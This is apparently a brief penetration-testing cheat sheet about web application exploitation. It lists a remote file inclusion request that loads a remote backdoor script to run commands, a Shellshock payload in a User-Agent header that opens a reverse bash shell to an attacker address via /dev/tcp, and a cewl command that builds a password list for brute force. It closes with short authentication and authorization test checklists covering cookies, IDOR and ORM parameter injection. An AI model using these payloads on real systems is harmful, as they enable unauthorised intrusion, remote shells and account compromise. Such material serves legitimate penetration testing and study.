Exploitation
curl http://target/?page=http://php/backdoor.php&cmd=id
curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/$myip/445 0>&1'" http://$ip/cgi-bin/user.sh
Virtual hosting
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers).
Brute Force Password
Create Passwd Directory
cewl -m 5 http://$ip/joomla/ > passwd.txt
Authentication
Check cookies
Check "admin" and "Admin", "admin " and "admin"
Check the redirection
Authorization
Check IDOR
Check .js, .json
Check Object-relational mapping (&admin[admin]=1)
Last updated
Was this helpful?